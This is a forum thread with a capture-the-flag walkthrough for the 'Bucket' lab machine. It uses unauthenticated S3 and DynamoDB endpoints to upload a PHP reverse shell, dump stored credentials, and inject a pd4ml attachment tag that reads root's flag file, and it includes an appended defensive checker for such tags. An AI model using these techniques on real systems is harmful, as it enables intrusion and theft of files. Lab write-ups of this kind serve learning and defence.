FLAG Bucket Commands to root
by y0ukn0wm3 - October 24, 2020 at 04:37 PM
#1
# install aws-cli
sudo apt-get install awscli

# configure aws 
aws configure
AWS Access Key ID [None]: AKIAIOSFODNN7EXAMPLE
AWS Secret Access Key [None]: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
Default region name [None]: us-west-2
Default output format [None]: json

# listing the available buckets in s3.bucket.htb
aws s3 ls --endpoint-url http://s3.bucket.htb --no-sign-request

# uploading files to the bucket in s3.bucket.htb
aws s3 cp shell.php s3://adserver/shell.php --endpoint-url http://s3.bucket.htb --no-sign-request

- Enumerating /shell/ in the http://s3.bucket.htb reveals the presence of dynamodb

# accessing the dynamodb, listing the available tables
aws dynamodb list-tables --endpoint-url http://s3.bucket.htb/ --no-sign-request

# scanning the enumerated tables (accessing the values in it)
aws dynamodb scan --table-name users --endpoint-url http://s3.bucket.htb/ --no-sign-request

- usernames and passwords are enumerated
- Uploading a php reverse shell and accessing it in http://s3.bucket.htb/shell.php
- now accessing the shell.php provides us with the reverse shell

# after obtaining a reverse shell as www-data
su roy :  n2vM-<_K_Q:.Aa2

- User.txt can be found in home directory of roy
- aws is installed on the system, and there is an internal service on port 8000 (web service) and on port 4566 (aws service)
- forward the port 8000 to local machine with chisel
- In bucket-app/index.php, the index.php shows another communication to the internal service: a new table named alerts, which is accessed with a POST request with the values data

# create a new dynamodb table
/usr/bin/aws dynamodb create-table --table-name alerts --attribute-definitions AttributeName=title,AttributeType=S --key-schema AttributeName=title,KeyType=HASH --provisioned-throughput ReadCapacityUnits=10,WriteCapacityUnits=5 --endpoint-url http://127.0.0.1:4566

# create a table and insert the values as requested by the index.php
/usr/bin/aws dynamodb put-item --table-name alerts --item '{"title": {"S": "Ransomware"}, "data": {"S": "<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/root.txt</pd4ml:attachment>"}}' --endpoint-url http://127.0.0.1:4566

- Now after inserting everything needed, make a curl POST

curl -X POST -d "action=get_alerts" http://127.0.0.1:8000/ -v

- Check out the http://127.0.0.1:8000/files in your browser to obtain the root.txt

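A defensive check for the stored-data step in the post above, added here as an example (not code from the thread or from the target application): it audits the JSON printed by `aws dynamodb scan` for string attributes that carry pd4ml directive tags or file: URIs before they reach an HTML-to-PDF renderer. The function names and the sample items are constructed for illustration.

```python
import json
import re

# Any tag in the pd4ml: namespace is a renderer directive, not alert content.
PD4ML_TAG = re.compile(r"<\s*/?\s*pd4ml:[\w-]+", re.IGNORECASE)
# A file: URI makes the renderer read from the local filesystem.
LOCAL_URI = re.compile(r"\bfile:", re.IGNORECASE)

def string_values(attr):
    """Yield every string inside one DynamoDB attribute value (S, SS, L, M)."""
    for type_tag, value in attr.items():
        if type_tag == "S":
            yield value
        elif type_tag == "SS":
            yield from value
        elif type_tag == "L":
            for element in value:
                yield from string_values(element)
        elif type_tag == "M":
            for nested in value.values():
                yield from string_values(nested)

def audit_item(item):
    """Return sorted (attribute, reason) findings for one DynamoDB item."""
    findings = set()
    for name, attr in item.items():
        for text in string_values(attr):
            if PD4ML_TAG.search(text):
                findings.add((name, "pd4ml directive tag"))
            if LOCAL_URI.search(text):
                findings.add((name, "file: URI"))
    return sorted(findings)

def audit_scan(scan_json):
    """Map item index -> findings for the JSON printed by `aws dynamodb scan`."""
    items = json.loads(scan_json).get("Items", [])
    report = {i: audit_item(item) for i, item in enumerate(items)}
    return {i: found for i, found in report.items() if found}

# Constructed sample in the scan output shape; the paths are placeholders.
SAMPLE_SCAN = json.dumps({"Items": [
    {"title": {"S": "Disk usage"}, "data": {"S": "<p>Volume at 91%</p>"}},
    {"title": {"S": "Ransomware"}, "data": {"S":
        '<pd4ml:attachment icon="PushPin">file:///etc/hostname</pd4ml:attachment>'}},
    {"title": {"S": "Nested"}, "meta": {"M": {"link": {"S": "FILE:///etc/hostname"}}}},
], "Count": 3, "ScannedCount": 3})

if __name__ == "__main__":
    for index, found in audit_scan(SAMPLE_SCAN).items():
        print(index, found)
```

The same `audit_item` check can run in the application path, rejecting an alert before its `data` value is passed to the PDF converter.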
#2
Thank u so much ...

I was wracking my head over this one ... finally rooted !
#3
(October 24, 2020 at 04:37 PM)y0ukn0wm3 Wrote:
Hi
How did you get aws configure values?
#4
(November 11, 2020 at 10:54 AM)Asur Wrote:
(October 24, 2020 at 04:37 PM)y0ukn0wm3 Wrote:
Hi
How did you get aws configure values?

Check out the Amazon documentation on awscli, because these are the default values that you get from reading the documentation.
#5
(October 24, 2020 at 04:37 PM)y0ukn0wm3 Wrote:

Hi, when I try aws s3 ls --endpoint-url http://s3.bucket.htb --no-sign-request, it said could not connect to endpoint http://s3.bucket.htb .... Any thoughts?